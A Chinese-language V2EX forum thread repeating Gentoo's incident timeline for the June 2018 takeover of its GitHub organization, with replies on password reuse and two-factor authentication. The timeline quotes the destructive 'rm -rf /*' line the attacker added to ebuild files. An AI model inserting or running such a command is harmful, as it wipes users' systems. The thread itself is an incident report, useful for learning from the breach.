Gentoo Linu x github 账号 6 月 28 日 被黑,所有 ebuild 文件被加入 rm -rf

2018-07-06 09:58:41 +08:00
 onion83
2018-06-28
20:05 2nd to last known legimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 38281f4252f89e3ef9cbae54dfc1ad553d296979
20:08 Last known legimate commit to gentoo/musl. matches git.gentoo.org/proj/musl.git.
Commit ID 60461ca1385809bacf6a114a7f1ecfe22f6da47f
20:19 Attacker tries a bad password on the account.
20:19 Attacker successfully gains administrative access
20:25 Attacker invites a dummy account to the org
20:25 Attacker creates a dummy account with administrative access.
20:25 Last known legimate commit to gentoo/gentoo. Matches git.gentoo.org/repo/gentoo.git
Auto-pushed by mirror bot.
Commit ID 73b724093b9c2a8756b8c35d3e09793342fa9ca9
Does NOT appear in the GitHub audit log for the org.
20:25 Attacker starts removing valid users
20:26 Earliest email timestamp of someone being removed from the organization.
20:29 First person notices that something is going on with the GitHub organization
20:30 Attacker invites a second malicious user.
20:32 Attacker adds second malicious user with admin privileges.
20:34 Malicious commit to gentoo/gentoo, 73b72409->fdd8da2e
adds readme.me file with racist text.
20:36 First report to Infra that something is going on with the GitHub organization.
20:38 Malicious commit to gentoo/gentoo, fdd8da2e->49464b73.
adds rm -rf /*& at the top of skel.ebuild
20:39 Attacker changes billing email, the first time.
20:45 Malicious commit 49464b73 is first noticed
20:48 Attacker changes billing email, the second time
20:49 First abuse report to GitHub support
20:50 Malicious commit to gentoo/gentoo, 49464b73->afcdc03b.
adds rm -rf /* at the top of every ebuild.
20:51 Infra's informal contact to GitHub via multiple personal channels
20:53 Second abuse report to GitHub
20:55 Malicious commit to gentoo/gentoo, afcdc03b->e6db0eb4, force-push.
Squash of entire history as of afcdc03b (rm -rf /* in ebuilds)
……

Via: https://wiki.gentoo.org/wiki/Github/2018-06-28
3826 次点击
所在节点    Linux
7 条回复
zhustec
2018-07-06 10:59:09 +08:00
致远星战况如何
Rasphino
2018-07-06 11:03:30 +08:00
楼主在发帖前能看看今天几号吗
fuxiaohei
2018-07-06 11:06:51 +08:00
当时就制止了
onion83
2018-07-06 12:41:52 +08:00
如果你不是 G 粉,请先不要没看链接就开喷,官方昨晚才宣布这次事故 resolved.
我希望分享的是一个 story 而不是一个 news.
zjp
2018-07-06 13:06:05 +08:00
一楼起的坏头
不过我还是没看明白怎么弄到的 Github 账号,暴力穷举?"tries a bad password"
xiaket
2018-07-06 13:08:26 +08:00
@zjp 貌似是管理员的密码跨站重用
greenskinmonster
2018-07-06 13:21:30 +08:00
没开两步验证吗?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/468563

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX